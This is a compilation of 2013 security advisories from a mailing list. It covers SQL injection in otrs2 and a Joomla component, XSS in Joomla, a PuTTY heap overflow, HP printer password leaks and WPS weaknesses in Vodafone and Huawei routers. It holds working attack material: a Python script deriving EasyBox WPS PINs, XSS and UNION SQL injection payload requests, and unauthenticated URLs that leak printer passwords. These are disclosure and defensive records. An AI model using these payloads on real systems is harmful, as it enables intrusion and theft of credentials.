[SECURITY] [DSA 2733-1] otrs2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2733-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso August 02, 2013http://www.debian.org/security/faq - - Package: otrs2 Vulnerability : SQL injection Problem type : remote Debian-specific: no CVE ID : CVE-2013-4717 It was discovered that otrs2, the Open Ticket Request System, does not properly sanitise user-supplied data that is used on SQL queries. An attacker with a valid agent login could exploit this issue to craft SQL queries by injecting arbitrary SQL code through manipulated URLs. For the oldstable distribution (squeeze), this problem has been fixed in version 2.4.9+dfsg1-3+squeeze4. This update also provides fixes for CVE-2012-4751, CVE-2013-2625 and CVE-2013-4088, which were all fixed for stable already. For the stable distribution (wheezy), this problem has been fixed in version 3.1.7+dfsg1-8+deb7u3. For the testing distribution (jessie), this problem has been fixed in version 3.2.9-1. For the unstable distribution (sid), this problem has been fixed in version 3.2.9-1. We recommend that you upgrade your otrs2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) iQIcBAEBCgAGBQJR/BD2AAoJEHidbwV/2GP+eHIQAMDZ7Q/0lFFurEfNoa+0uS5e kW4lOIggjajvhnmZ95zlOQEBlHz/yXUwGoVnX8CvYyjXz0bqrPQc6QWOk5y0Wm1q ETKQIOeUXXFpDL7ZLiXvoWpy8RgQskhCiqmraVBsGKKLeZRnTT9yz31sTtWJ5RjK umkN1a4mPIFtJboPJRq/JCw9sDU1Fldn/XGcqFQel/u1z5w11ef1Dfo7o6crvEJa 6PwxKIQNaDxapZxlPaAoFycRlQ96DJ1et1bVg7c9AwqFyhgbubihKAlJ8WFZMk9F 8+N+kuZB/HE/pp1PVpyWBm7mUelBzBaGFnpohAZpSE6Yc/sPLrFt/E7PJ6XpAw1K HCSKQw64twUK5hBxvrG/soyFrHxieVo2NtGLLPOsxQWH/Dud6BgFK3BH4QCImo9m dul0OEui6cxt2edCyoLhAMcnq4kLcY9wKYrZMvwQrCJEKBlR5AzgELBwzm2wm6JP 2uOBK8g+Spy9oT3eBgxUHIztsrN7nDUIbfdgUpjpd9U4ywbVfOBfBtlAEF377rAh qR8muzXnGlrrssZE1ALgdHn6hXCYkFPnQPPraQ5olbwDWTZIkGi4257KTxvB5mry TAXwd1JDIhwSZ+J5QEp2VgxhAO0HAEk0keUOhyf4z3b8DJJDxN/frB0BmijohwSL aSH+yPNXIEwyNDeoHOJ2 =binX -END PGP SIGNATURE-
SEC Consult SA-20130805-0 :: Vodafone EasyBox Default WPS PIN Algorithm Weakness
SEC Consult Vulnerability Lab Security Advisory 20130805-0 === title: Vodafone EasyBox Default WPS PIN Algorithm Weakness product: EasyBox 802 EasyBox 803 vulnerable version: EasyBox 802 - all versions EasyBox 803 - Production date before August 2011 fixed version: EasyBox 802 - no vendor patch available EasyBox 803 - Production date after August 2011 impact: Critical homepage: http://www.vodafone.de found: 2012-12-01 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor/product description: - These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be accessed with the default WPS PIN (PIN External Registrar) printed on the back of the device. Vulnerability overview/description: --- The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address. An unauthenticated attacker within the range of the access point can capture the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN for it. This PIN can then be used to retrieve the current access point configuration (including the WPA passphrase) or to change the configuration (SSID, encryption method, passphrase, ...) of the access point. An attacker can afterwards connect to the access point and perform malicious activities such as Man-in-the-middle attacks using ARP spoofing, attack clients on the internal network, etc. Proof of concept: - A script that implements the derivation algorithm has been developed: #!/usr/bin/env python import sys, re def gen_pin (mac_str, sn): mac_int = [int(x, 16) for x in mac_str] sn_int = [0]*5+[int(x) for x in sn[5:]] hpin = [0] * 7 k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) 0xF k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) 0xF hpin[0] = k1 ^ sn_int[9]; hpin[1] = k1 ^ sn_int[8]; hpin[2] = k2 ^ mac_int[9]; hpin[3] = k2 ^ mac_int[10]; hpin[4] = mac_int[10] ^ sn_int[9]; hpin[5] = mac_int[11] ^ sn_int[8]; hpin[6] = k1 ^ sn_int[7]; pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 1000 # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or # http://download.microsoft.com/download/a/f/7/afe5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc accum = 0 t = pin while (t): accum += 3 * (t % 10) t /= 10 accum += t % 10 t /= 10 return '%i%i' % (pin, (10 - accum % 10) % 10) def main(): if len(sys.argv) != 2: sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n') mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1]) if len(mac_str) != 12: sys.exit('check MAC format!\n') sn = 'R%05i' % int(mac_str[8:12], 16) print 'derived serial number:', sn print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9]) print 'WPS pin:', gen_pin(mac_str, sn) if __name__ == __main__: main() Vulnerable / tested versions: - The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803, both produced by Arcadyan/Astoria Networks. Other devices of this vendor (including EasyBox 903) might be affected as well. Vodafone did not provide any information on this. According to Vodafone / CERT-Bund, the following devices are vulnerable: EasyBox 802 - all versions EasyBox 803 - production date before August 2011 Vendor contact timeline: 2012-12-14: Contacting Vodafone via customer support. 2013-01-09: Vodafone refers to datensch...@vodafone.com. 2013-01-10: Requesting encryption keys. 2013-01-14: Vodafone provides encryption keys. 2013-01-15: Sending advisory and proof of concept exploit via encrypted channel. 2013-01-25: Sending reminder regarding SEC Consult disclosure policy. 2013-01-25: Automatic response: Out of office until 2013-02-24. 2013-01-25: Requesting new contact person from csirt...@vodafone.com and du-de-zv-mxl-csirt...@vodafone.com. 2013-01-28: Vodafone acknowledges receipt of advisory. 2013-02-05: Vodafone confirms validity of provided information, gives information about some newer devices which are not affected, mentions that customers have already been notified to change default
PuTTY SSH handshake heap overflow
PuTTY SSH handshake heap overflow (CVE-2013-4852) Description: PuTTY versions 0.62 and earlier - as well as all software that integrates these versions of PuTTY - are vulnerable to an integer overflow leading to heap overflow during the SSH handshake before authentication, caused by improper bounds checking of the length parameter received from the SSH server. This allows remote attackers to cause denial of service, and may have more severe impact on the operation of software that uses PuTTY code. Affected software products: - PuTTY up to and including 0.62 - WinSCP before 5.1.6 - all other software that uses vulnerable (revision 9895 or earlier) PuTTY code Details: A malformed size value in the SSH handshake could cause an integer overflow, as the getstring() function in sshrsa.c and sshdss.c read the handshake message length without checking that it was not a negative number. Specifically, the bignum_from_bytes() function invoked by getstring() received a data buffer along with its length represented by a signed integer (nbytes) and performed the following arithmetical operation before allocating memory to store the buffer: w = (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES; /* bytes-words */ result = newbn(w); If the value of nbytes was -1 (0x), the value of w would overflow to a very small positive number (depending on the value of BIGNUM_INT_BYTES), causing newbn() to reserve a very small memory area. Then a large number of bytes would be copied into the data buffer afterwards, resulting in a heap overflow. Similarly, if nbytes was chosen so that w would be -1, the newbn() function would allocate zero bytes in memory via snewn() and attempt to write the size of the Bignum (in four bytes) into the allocated zero-byte area, also resulting in a heap overflow. Consequences: In the standalone PuTTY client the attacker does not have precise control over the memory corruption, so this bug can only cause a local denial-of-service (crash). However, in other software that uses PuTTY code, such heap corruption could have more severe effects. Specifically in case of WinSCP, this vulnerability could potentially lead to code execution due to the exception handling employed by the program. Solution: This vulnerability has been fixed in the development version of PuTTY [2]. All developers using PuTTY code are recommended to use revision 9896 or later. The potential code execution vulnerability has been addressed in WinSCP 5.1.6 [3]. Credits: This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu) References: [1] http://www.search-lab.hu/advisories/secadv-20130722 [2] http://svn.tartarus.org/sgt?view=revisionsortby=daterevision=9896 [3] http://winscp.net/tracker/show_bug.cgi?id=1017
Joomla core = 3.1.5 reflected XSS vulnerability
- Original release date: August 05, 2013 - Discovered by: Emilio Pinna (Application Security Analyst at Abinsula) - Contact: (emilio (dot) pinn (at) gmail (dot) com) - Severity: 4.3/10 (Base CVSS Score) VULNERABILITY - Joomla core package = 3.1.5 includes a PHP script that suffers from reflected XSS vulnerability that allows to inject HTML and malicious scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Joomla is one of the most installed CMS with dozens of millions of installations. DESCRIPTION - Affected file libraries/idna_convert/example.php has different injection points: - Unsanitized lang parameter in line 24 - Unsanitized file name printing on lines 112 and 119 PROOF OF CONCEPT - http://localhost/joomla/libraries/idna_convert/example.php?lang=;scriptalert(document.cookie);/script!-- BUSINESS IMPACT - As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session that visits the malicious crafted url. SYSTEMS AFFECTED - Joomla-CMS = 3.1.5 SOLUTION - Fixed removing the vulnerable example file on git with commit c00c033d33d901e1ca6be9061a44e55acd041b1f REFERENCES - http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/ https://github.com/joomla/joomla-cms/issues/1658 CREDITS - Emilio Pinna (emilio (dot) pinn (at) gmail (dot) com) DISCLOSURE TIMELINE - August 4, 2013: Opened a ticket describing the bug by Adam Willard. August 5, 2013: Fixed by Michael Babker. August 5, 2013: Vulnerability disclosed by Emilio Pinna. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.
HP LaserJet Pro printers remote admin password extraction
Some of the networked HP LaserJet printers have hidden URLs hardcoded in the firmware. The URLs are not authenticated and can be used to extract admin password in plaintext among other information like WiFi settings (including WPS PIN). Models affected: HP LaserJet Pro P1102w, HP LaserJet Pro P1606dn, HP LaserJet Pro CP1025nw, HP LaserJet Pro M1212nf MFP, HP LaserJet Pro M1213nf MFP, HP LaserJet Pro M1214nfh MFP, HP LaserJet Pro M1216nfh MFP, HP LaserJet Pro M1217nfw MFP, HP LaserJet Pro M1218nfs MFP, Possibly others(?) URLs details: Here are at least two interesting URLs, which can be accessed without authentication: http://IP_ADDRESS/dev/save_restore.xml (gives admin password/configuration parameters in plaintext) http://IP_ADDRESS:8080/IoMgmt/Adapters/wifi0/WPS/Pin (gives WPS PIN in plaintext) Original disclosure: http://sekurak.pl/hp-laserjet-pro-printers-remote-admin-password-extraction/ Original information from HP: https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.begCacheTok=com.vignette.cachetokenjavax.portlet.endCacheTok=com.vignette.cachetokenjavax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%253Demr_na-c03825817-1%257CdocLocale%253D%257CcalledBy%253Djavax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01ac.admitted=1375697666155.876444892.199480143 History 19.04.2013 vendor notified 19.04.2013 initial vendor response received 24.04.2013 issue confirmed 26.07.2013 new firmwares released 31.07.2013 issues summary published by vendor 02.08.2013 disclosure -- Michal Sajdak, Securitum
Joomseller Events Booking Pro and JSE Event reflected XSS
-- Joomseller Events Booking Pro and JSE Event reflected XSS -- [+] Software Link: http://www.joomseller.com/joomla-components/jse-event.html [+] Affected Versions: Component com_events_booking_v5 Component com_jse_event 1.0.1 [+] Vulnerability Description: The vulnerable files are the following: .- For JSE Event: /modules/mod_jse_mini_calendar/tmpl/tootip.php .-For Events Booking pro: /modules/mod_eb_v5_mini_calendar/tmpl/tootip.php The info parameter is not correctly sanitized before being used, allowing an attacker to perform XSS attacks. As a proof of concept, an attacker could perform the following request: http://example.com/modules/mod_eb_v5_mini_calendar/tmpl/tootip.php?info=eyJldmVudHMiOiIoMTU6MDA6MDApIDxzY3JpcHQ%2BYWxlcnQoMSk7PC9zY3JpcHQ%2BIiwgImV2ZW50X2lkIjoiNjQiLCAiaXRlbWlkIjoiMSIsICJldnJfaWQiOiIxMTkxIn0%3D where the contents of the info parameter is the following payload encoded using base64 encoding {events:(15:00:00) scriptalert(1);/script, event_id:64, itemid:1, evr_id:1191} [+] Solution: Upgrade to JSE Event version 1.0.1. [+] Report Timeline: [30/07/2013] - Vulnerability reported to the vendor [30/07/2013] - Developer confirm vulnerability and update released [05/08/2013] - Public disclosure [+] Credits: Vulnerability discovered by Gaston Traberg.
Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities
- Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities - == Description == - Software link: http://stackideas.com/sectionex - Affected versions: version 2.5.96 is vulnerable. Other versions might be affected as well. - Author: Matias Fontanini == Vulnerabilities == When using the category view, the component does not correctly sanitize the filter_order and filter_order_Dir parameters before using them to construct SQL queries, making it vulnerable to SQL Injection attacks. In order to exploit these vulnerabilities, an attacker could perform requests like the following ones: - For the filter_order parameter: POST /index.php?option=com_sectionexview=categoryid=XItemid=Y filter_title=filter_content=limit=0sectionid=20filter_order=1 limit 1 offset 1) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23filter_order_Dir=DESC - For the filter_order_Dir parameter: POST /index.php?option=com_sectionexview=categoryid=XItemid=Y filter_title=filter_content=limit=0sectionid=20filter_order=1filter_order_Dir=DESC limit 1 offset 1) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23 == Solution == Upgrade the product to the 2.5.104 version. == Report timeline == [2013-07-30] Vulnerabilities reported to the developers. [2013-07-30] Developers answered back indicating that a new release would be made soon. [2013-08-01] SectionEx 2.5.104 was released, which fixed the issues reported. [2013-08-05] Public disclosure.
Huawei B153 3G/UMTS router WPS weakness
Huawei B153 3G/UMTS router WPS weakness === [ADVISORY INFORMATION] Title: Huawei B153 3G/UMTS router WPS weakness Discovery date: 21/05/2013 Release date: 05/08/2013 Advisory URL: http://blog.emaze.net/2013/08/huawei-b153-3gumts-router-wps-weakness.html Credits:Roberto Paleari (roberto.pale...@emaze.net, @rpaleari) Alessandro Di Pinto (alessandro.dipi...@emaze.net, @adipinto) [VULNERABILITY INFORMATION] Class: Authentication bypass [AFFECTED PRODUCTS] We confirm the presence of the security vulnerability on the following products/firmware versions: * Huawei B153 3G/UMTS router, software version 1096.11.405.03.111sp02 Other device models and firmware versions are probably also vulnerable, but they were not checked. As required by the ISP that distributes this device to end-users, we do not disclose the full commercial name of the product, but only the manufacturer device model (i.e., Huawei B153). [VULNERABILITY DETAILS] To allow wireless users to easily authenticate to the WPA2 Wi-Fi network, the Huawei B153 device supports the WPS procotol [1]. The WPS External Registrar PIN-base method is notoriously insecure, as allows attackers to brute force the access PIN in few hours [2]. In the default device configuration, the WPS daemon is configured to accept WPS PIN authentication attempts, but no WPS PIN is configured. Thus, the device is supposed to reject any possible PIN-based WPS request, allowing only the push button mechanism, that requires physical interaction. Unfortunately we detected that, despite no WPS PIN is actually configured, a specially-crafted WPS session can still force the device to complete the External Registrar handshake, returning to the attacker the current WPA2 passphrase. In other terms attackers located within the wireless range of the device can instantly recover the WPA passphrase. We would also like to stress out that this vulnerability is present in the default device configuration, and no user action is required. This attack cannot be exploited using publicly available tools: no standard WPS cracking tool performs handshakes using the specially-crafted WPS session required to exploit this security issue. As a consequence, we implemented our proof-of-concept as a small patch to the reaver WPS cracking tool [3] (the unmodified version of reaver *cannot* recover the password for this device). Footnotes: [1] http://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup [2] http://www.kb.cert.org/vuls/id/723755 [3] https://code.google.com/p/reaver-wps/ [REMEDIATION] Huawei has released an updated firmware version that addresses this issue. [COPYRIGHT] Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. [DISCLAIMER] Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.
Re: Joomla core = 3.1.5 reflected XSS vulnerability
It would have been more prudent, to public this vulnerability AFTER patch update (J! 3.1.6) is released - and not before.